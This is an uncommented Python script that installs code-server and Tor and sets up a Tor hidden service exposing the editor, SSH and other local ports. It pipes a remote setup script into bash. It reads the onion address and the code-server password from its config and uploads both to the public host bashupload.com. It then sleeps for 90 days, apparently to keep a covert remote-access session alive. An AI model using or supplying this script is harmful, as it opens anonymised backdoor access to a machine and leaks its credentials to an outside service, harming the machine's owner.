import os
os.system("apt-get update && apt-get upgrade -y && apt-get install -y wget curl nano")
os.system("apt-get install -y sudo git xz-utils openssh-server build-essential net-tools dialog apt-utils libevent* libsecret*")
os.system("wget https://github.com/coder/code-server/releases/download/v4.9.1/code-server_4.9.1_amd64.deb")
os.system("dpkg -i code-server_4.9.1_amd64.deb")
os.system("wget -O - https://deb.nodesource.com/setup_18.x | bash && apt-get -y install nodejs && npm i -g updates")
os.system("wget https://deb.torproject.org/torproject.org/pool/main/t/tor/tor_0.4.7.13-1~focal+1_amd64.deb")
os.system("dpkg -i tor_0.4.7.13-1~focal+1_amd64.deb")
os.system("apt --fix-broken install -y")
os.system("sed -i 's\#SocksPort 9050\SocksPort 9050\ ' /etc/tor/torrc")
os.system("sed -i 's\#ControlPort 9051\ControlPort 9051\ ' /etc/tor/torrc")
os.system("sed -i 's\#HashedControlPassword\HashedControlPassword\ ' /etc/tor/torrc")
os.system("sed -i 's\#CookieAuthentication 1\CookieAuthentication 1\ ' /etc/tor/torrc")
os.system("sed -i 's\#HiddenServiceDir /var/lib/tor/hidden_service/\HiddenServiceDir /var/lib/tor/hidden_service/\ ' /etc/tor/torrc")
os.system("sed -i '72s\#HiddenServicePort 80 127.0.0.1:80\HiddenServicePort 12345 127.0.0.1:12345\ ' /etc/tor/torrc")
os.system("sed -i '73s\#HiddenServicePort 22 127.0.0.1:22\HiddenServicePort 22 127.0.0.1:22\ ' /etc/tor/torrc")
os.system("sed -i '74 i HiddenServicePort 8080 127.0.0.1:8080' /etc/tor/torrc")
os.system("sed -i '75 i HiddenServicePort 4000 127.0.0.1:4000' /etc/tor/torrc")
os.system("sed -i '76 i HiddenServicePort 8000 127.0.0.1:8000' /etc/tor/torrc")
os.system("sed -i '77 i HiddenServicePort 9000 127.0.0.1:9000' /etc/tor/torrc")
os.system("rm -rf code-server_4.9.1_amd64.deb tor_0.4.7.13-1~focal+1_amd64.deb")
os.system("code-server --bind-addr 127.0.0.1:12345 >> vscode.log &")
os.system("tor > tor.log &")
os.system("echo '######### wait Tor #########'")
os.system("sleep 1m")
os.system("cat /var/lib/tor/hidden_service/hostname >> VSCODETOr.txt &")
os.system("sed -n '3'p ~/.config/code-server/config.yaml >> VSCODETOr.txt &")
os.system("curl bashupload.com -T VSCODETOr.txt")
os.system("echo '######### OK #########'")
os.system("sleep 90d")
